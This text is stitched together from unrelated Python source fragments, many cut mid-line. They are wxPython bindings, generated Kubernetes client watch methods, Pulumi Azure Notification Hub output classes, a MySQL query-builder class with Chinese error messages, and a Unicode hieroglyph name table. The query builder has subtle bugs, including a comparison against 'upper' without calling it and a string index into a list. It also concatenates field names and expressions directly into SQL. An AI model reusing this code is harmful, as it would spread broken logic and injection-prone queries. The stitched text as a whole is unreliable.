self.m_bmToggleBtnPrimary2.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnPrimary2OnToggleButton )
self.m_bmToggleBtnSecondary2.Bind( wx.EVT_TOGGLEBUTTON, | |
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_secret`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_namespaced_secret`")
resource_path = '/api/v1/watch/namespaces/{namespace}/secrets/{name}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_account_list(self, namespace, **kwargs):
"""
watch individual changes to a list of ServiceAccount
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_account_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_account_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_account_list`")
resource_path = '/api/v1/watch/namespaces/{namespace}/serviceaccounts'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_account(self, namespace, name, **kwargs):
"""
watch changes to an object of kind ServiceAccount
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_account(namespace, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str name: name of the ServiceAccount (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'name', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_account`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_namespaced_service_account`")
resource_path = '/api/v1/watch/namespaces/{namespace}/serviceaccounts/{name}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_list(self, namespace, **kwargs):
"""
watch individual changes to a list of Service
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_list`")
resource_path = '/api/v1/watch/namespaces/{namespace}/services'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] | |
"certificate_key", certificate_key)
if mpns_certificate is not None:
pulumi.set(__self__, "mpns_certificate", mpns_certificate)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
@property
@pulumi.getter(name="certificateKey")
def certificate_key(self) -> Optional[str]:
"""
The certificate key for this credential.
"""
return pulumi.get(self, "certificate_key")
@property
@pulumi.getter(name="mpnsCertificate")
def mpns_certificate(self) -> Optional[str]:
"""
The MPNS certificate.
"""
return pulumi.get(self, "mpns_certificate")
@property
@pulumi.getter
def thumbprint(self) -> Optional[str]:
"""
The MPNS certificate Thumbprint
"""
return pulumi.get(self, "thumbprint")
@pulumi.output_type
class SharedAccessAuthorizationRulePropertiesResponse(dict):
"""
SharedAccessAuthorizationRule properties.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "claimType":
suggest = "claim_type"
elif key == "claimValue":
suggest = "claim_value"
elif key == "createdTime":
suggest = "created_time"
elif key == "keyName":
suggest = "key_name"
elif key == "modifiedTime":
suggest = "modified_time"
elif key == "primaryKey":
suggest = "primary_key"
elif key == "secondaryKey":
suggest = "secondary_key"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SharedAccessAuthorizationRulePropertiesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SharedAccessAuthorizationRulePropertiesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SharedAccessAuthorizationRulePropertiesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
claim_type: str,
claim_value: str,
created_time: str,
key_name: str,
modified_time: str,
primary_key: str,
revision: int,
secondary_key: str,
rights: Optional[Sequence[str]] = None):
"""
SharedAccessAuthorizationRule properties.
:param str claim_type: A string that describes the claim type
:param str claim_value: A string that describes the claim value
:param str created_time: The created time for this rule
:param str key_name: A string that describes the authorization rule.
:param str modified_time: The last modified time for this rule
:param str primary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param int revision: The revision number for the rule
:param str secondary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param Sequence[str] rights: The rights associated with the rule.
"""
pulumi.set(__self__, "claim_type", claim_type)
pulumi.set(__self__, "claim_value", claim_value)
pulumi.set(__self__, "created_time", created_time)
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "modified_time", modified_time)
pulumi.set(__self__, "primary_key", primary_key)
pulumi.set(__self__, "revision", revision)
pulumi.set(__self__, "secondary_key", secondary_key)
if rights is not None:
pulumi.set(__self__, "rights", rights)
@property
@pulumi.getter(name="claimType")
def claim_type(self) -> str:
"""
A string that describes the claim type
"""
return pulumi.get(self, "claim_type")
@property
@pulumi.getter(name="claimValue")
def claim_value(self) -> str:
"""
A string that describes the claim value
"""
return pulumi.get(self, "claim_value")
@property
@pulumi.getter(name="createdTime")
def created_time(self) -> str:
"""
The created time for this rule
"""
return pulumi.get(self, "created_time")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> str:
"""
A string that describes the authorization rule.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="modifiedTime")
def modified_time(self) -> str:
"""
The last modified time for this rule
"""
return pulumi.get(self, "modified_time")
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "primary_key")
@property
@pulumi.getter
def revision(self) -> int:
"""
The revision number for the rule
"""
return pulumi.get(self, "revision")
@property
@pulumi.getter(name="secondaryKey")
def secondary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "secondary_key")
@property
@pulumi.getter
def rights(self) -> Optional[Sequence[str]]:
"""
The rights associated with the rule.
"""
return pulumi.get(self, "rights")
@pulumi.output_type
class SharedAccessAuthorizationRuleResourceResponse(dict):
"""
Description of a Namespace AuthorizationRules.
"""
def __init__(__self__, *,
claim_type: str,
claim_value: str,
created_time: str,
id: str,
key_name: str,
modified_time: str,
name: str,
primary_key: str,
revision: int,
secondary_key: str,
type: str,
location: Optional[str] = None,
rights: Optional[Sequence[str]] = None,
sku: Optional['outputs.SkuResponse'] = None,
tags: Optional[Mapping[str, str]] = None):
"""
Description of a Namespace AuthorizationRules.
:param str claim_type: A string that describes the claim type
:param str claim_value: A string that describes the claim value
:param str created_time: The created time for this rule
:param str id: Resource Id
:param str key_name: A string that describes the authorization rule.
:param str modified_time: The last modified time for this rule
:param str name: Resource name
:param str primary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param int revision: The revision number for the rule
:param str secondary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param str type: Resource type
:param str location: Resource location
:param Sequence[str] rights: The rights associated with the rule.
:param 'SkuResponse' sku: The sku of the created namespace
:param Mapping[str, str] tags: Resource tags
"""
pulumi.set(__self__, "claim_type", claim_type)
pulumi.set(__self__, "claim_value", claim_value)
pulumi.set(__self__, "created_time", created_time)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "modified_time", modified_time)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "primary_key", primary_key)
pulumi.set(__self__, "revision", revision)
pulumi.set(__self__, "secondary_key", secondary_key)
pulumi.set(__self__, "type", type)
if location is not None:
pulumi.set(__self__, "location", location)
if rights is not None:
pulumi.set(__self__, "rights", rights)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="claimType")
def claim_type(self) -> str:
"""
A string that describes the claim type
"""
return pulumi.get(self, "claim_type")
@property
@pulumi.getter(name="claimValue")
def claim_value(self) -> str:
"""
A string that describes the claim value
"""
return pulumi.get(self, "claim_value")
@property
@pulumi.getter(name="createdTime")
def created_time(self) -> str:
"""
The created time for this rule
"""
return pulumi.get(self, "created_time")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> str:
"""
A string that describes the authorization rule.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="modifiedTime")
def modified_time(self) -> str:
"""
The last modified time for this rule
"""
return pulumi.get(self, "modified_time")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "primary_key")
@property
@pulumi.getter
def revision(self) -> int:
"""
The revision number for the rule
"""
return pulumi.get(self, "revision")
@property
@pulumi.getter(name="secondaryKey")
def secondary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "secondary_key")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def rights(self) -> Optional[Sequence[str]]:
"""
The rights associated with the rule.
"""
return pulumi.get(self, "rights")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The sku of the created namespace
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@pulumi.output_type
class SkuResponse(dict):
"""
The Sku description for a namespace
"""
def __init__(__self__, *,
name: str,
capacity: Optional[int] = None,
family: Optional[str] = None,
size: Optional[str] = None,
tier: Optional[str] = None):
"""
The Sku description for a namespace
:param str name: Name of the notification hub sku
:param int capacity: The capacity of the resource
:param str family: The Sku Family
:param str size: The Sku size
:param str tier: The tier of particular sku
"""
pulumi.set(__self__, "name", name)
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the notification hub sku
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def capacity(self) -> Optional[int]:
"""
The capacity of the resource
"""
return pulumi.get(self, "capacity")
@property
@pulumi.getter
def family(self) -> Optional[str]:
"""
The Sku Family
"""
return pulumi.get(self, "family")
@property
@pulumi.getter
def size(self) -> Optional[str]:
"""
The Sku size
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def tier(self) -> Optional[str]:
"""
The tier of particular sku
"""
return pulumi.get(self, "tier")
@pulumi.output_type
class WnsCredentialResponse(dict):
"""
Description of a NotificationHub WnsCredential.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "packageSid":
suggest = "package_sid"
elif key == "secretKey":
suggest = "secret_key"
elif key == "windowsLiveEndpoint":
suggest = "windows_live_endpoint"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WnsCredentialResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WnsCredentialResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WnsCredentialResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
package_sid: Optional[str] = None,
secret_key: Optional[str] = None,
windows_live_endpoint: Optional[str] = None):
"""
Description of a NotificationHub WnsCredential.
:param str | |
' + having
return self
def join(self, join):
if isinstance(join, str):
self.joinString += ' INNER JOIN ' + join
elif isinstance(join, (list, tuple)):
if len(join) != 2:
self.throw_exception("join子句的数组参数必须有两个元素")
self.joinString += ' ' + join[1] + ' JOIN ' + join[0]
else:
self.throw_exception("join子句的参数只支持字符串或list、tuple")
return self
def fetchSql(self, fetchSql=True):
self.fetchSql = fetchSql
return self
def count(self, field='*'):
self.fieldString = ' COUNT(' + field + ') AS f_count'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_count']
def max(self, field):
self.fieldString = ' MAX(' + field + ') AS f_max'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_max']
def min(self, field):
self.fieldString = ' MIN(' + field + ') AS f_min'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_min']
def avg(self, field):
self.fieldString = ' AVG(' + field + ') AS f_avg'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_avg']
def sum(self, field):
self.fieldString = ' SUM(' + field + ') AS f_sum'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_sum']
def buildSql(self):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
buildSql = self._replaceSpecialChar('%s', self.whereValueArray, sqlString)
self._clearSubString()
return '( ' + buildSql + ' )'
def find(self, primary_key_value=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.limitString = ' LIMIT 1'
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
res = self.query(sqlString, True)
return res
def select(self, query=True):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
if query == False:
self.fetchSql = True
res = self.query(sqlString)
return res
def add(self, data=''):
field_str = ''
if data != '':
if not isinstance(data, dict):
self.throw_exception('add方法只支持传入字典')
length = len(data)
if length == 0:
placeholder = ''
else:
for key, val in data.items():
field_str += '`' + key + '`,'
self.whereValueArray.append(val)
field_str = field_str.rstrip(',')
placeholder = '%s'
for i in range(1, length):
placeholder += ',%s'
else:
placeholder = ''
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES (' + placeholder + ')'
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def addAll(self, dataList):
if not isinstance(dataList, (list, tuple)):
self.throw_exception('addAll方法只支持传入list或tuple')
field_str = ''
fieldList = []
number = len(dataList)
valueListStr = ''
if number == 0:
self.throw_exception('addAll方法请勿传入空数组')
if not isinstance(dataList[0], dict):
self.throw_exception('addAll方法传入的参数须为由字典组成的列表或元组')
number_field = len(dataList[0])
if number_field == 0:
valueListStr += '()'
for i in range(1, number):
if not isinstance(dataList[i], dict):
self.throw_exception('addAll方法传入的参数须为由字典组成的列表或元组')
valueListStr += ',()'
else:
valueStr = '('
for key, val in dataList[0].items():
fieldList.append(key)
self.whereValueArray.append(val)
field_str += key + ','
valueStr += '%s,'
field_str = field_str.rstrip(',')
valueStr = valueStr.rstrip(',')
valueStr += ')'
valueListStr += valueStr
for i in range(1, number):
for j in range(number_field):
self.whereValueArray.append(dataList[i][fieldList[j]])
valueListStr += ',' + valueStr
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES ' + valueListStr
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def setField(self, *field):
param_number = len(field)
if field == 0:
self.throw_exception('setField子句须传入参数')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if isinstance(field[0], dict) and self.columns[0] != '' and self.columns[0] in field[0]:
if isinstance(field[0][self.columns[0]], (list, tuple)):
if field[0][self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns[0] + '` = ' + field[0][self.columns[0]][1].strip()
else:
self.throw_exception('setField子句仅支持exp表达式更新')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(field[0][self.columns[0]])
del field[0][self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('没有任何更新条件,且指定数据表无主键,不被允许执行更新操作')
else:
self.throw_exception('没有任何更新条件,数据对象本身也不包含主键字段,不被允许执行更新操作')
setFieldStr = ''
updateValueArray = []
if isinstance(field[0], str):
if param_number != 2:
self.throw_exception('setField子句接收两个参数(属性名,属性值)')
if field[0].find('.') == -1:
setFieldStr += '`' + field[0].strip() + '` = %s'
else:
setFieldStr += field[0].strip() + ' = %s'
updateValueArray.append(field[1])
elif isinstance(field[0], dict):
if param_number != 1:
self.throw_exception('setField子句只接收一个数组参数')
for key, val in field[0].items():
if isinstance(val, (list, tuple)):
if val[0].upper() == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('setField子句仅支持exp表达式更新')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
else:
self.throw_exception('setField子句传入的参数类型错误:' + field[0])
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def setInc(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' + ' + str(value)]
return self.save(data)
def setDec(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' - ' + str(value)]
return self.save(data)
def save(self, data):
if not isinstance(data, dict):
self.throw_exception('save子句只接收数组参数')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if self.columns[0] != '' and self.columns[0] in data:
if isinstance(data[self.columns[0]], (list, tuple)):
if data[self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns['PRI'] + '` = ' + data[self.columns[0]][1].strip()
else:
self.throw_exception('save子句仅支持exp表达式更新')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(data[self.columns[0]])
del data[self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('没有任何更新条件,且指定数据表无主键,不被允许执行更新操作')
else:
self.throw_exception('没有任何更新条件,数据对象本身也不包含主键字段,不被允许执行更新操作')
setFieldStr = ''
updateValueArray = []
for key, val in data.items():
if isinstance(val, (list, tuple)):
# 支持exp表达式进行数据更新
if val[0].upper == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('save子句仅支持exp表达式更新')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def delete(self, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
self.parseWhere()
if self.whereString == '':
if self.joinString == '' or self.joinString.upper().find(' ON ') == -1:
self.throw_exception('没有传入任何条件,不被允许执行删除操作')
sqlString = 'DELETE' + table + ' FROM ' + table_name + | |
'ANATOLIAN HIEROGLYPH A143',
83115: 'ANATOLIAN HIEROGLYPH A144',
83116: 'ANATOLIAN HIEROGLYPH A145',
83117: 'ANATOLIAN HIEROGLYPH A146',
83118: 'ANATOLIAN HIEROGLYPH A147',
83119: 'ANATOLIAN HIEROGLYPH A148',
83120: 'ANATOLIAN HIEROGLYPH A149',
83121: 'ANATOLIAN HIEROGLYPH A150',
83122: 'ANATOLIAN HIEROGLYPH A151',
83123: 'ANATOLIAN HIEROGLYPH A152',
83124: 'ANATOLIAN HIEROGLYPH A153',
83125: 'ANATOLIAN HIEROGLYPH A154',
83126: 'ANATOLIAN HIEROGLYPH A155',
83127: 'ANATOLIAN HIEROGLYPH A156',
83128: 'ANATOLIAN HIEROGLYPH A157',
83129: 'ANATOLIAN HIEROGLYPH A158',
83130: 'ANATOLIAN HIEROGLYPH A159',
83131: 'ANATOLIAN HIEROGLYPH A160',
83132: 'ANATOLIAN HIEROGLYPH A161',
83133: 'ANATOLIAN HIEROGLYPH A162',
83134: 'ANATOLIAN HIEROGLYPH A163',
83135: 'ANATOLIAN HIEROGLYPH A164',
83136: 'ANATOLIAN HIEROGLYPH A165',
83137: 'ANATOLIAN HIEROGLYPH A166',
83138: 'ANATOLIAN HIEROGLYPH A167',
83139: 'ANATOLIAN HIEROGLYPH A168',
83140: 'ANATOLIAN HIEROGLYPH A169',
83141: 'ANATOLIAN HIEROGLYPH A170',
83142: 'ANATOLIAN HIEROGLYPH A171',
83143: 'ANATOLIAN HIEROGLYPH A172',
83144: 'ANATOLIAN HIEROGLYPH A173',
83145: 'ANATOLIAN HIEROGLYPH A174',
83146: 'ANATOLIAN HIEROGLYPH A175',
83147: 'ANATOLIAN HIEROGLYPH A176',
83148: 'ANATOLIAN HIEROGLYPH A177',
83149: 'ANATOLIAN HIEROGLYPH A178',
83150: 'ANATOLIAN HIEROGLYPH A179',
83151: 'ANATOLIAN HIEROGLYPH A180',
83152: 'ANATOLIAN HIEROGLYPH A181',
83153: 'ANATOLIAN HIEROGLYPH A182',
83154: 'ANATOLIAN HIEROGLYPH A183',
83155: 'ANATOLIAN HIEROGLYPH A184',
83156: 'ANATOLIAN HIEROGLYPH A185',
83157: 'ANATOLIAN HIEROGLYPH A186',
83158: 'ANATOLIAN HIEROGLYPH A187',
83159: 'ANATOLIAN HIEROGLYPH A188',
83160: 'ANATOLIAN HIEROGLYPH A189',
83161: 'ANATOLIAN HIEROGLYPH A190',
83162: 'ANATOLIAN HIEROGLYPH A191',
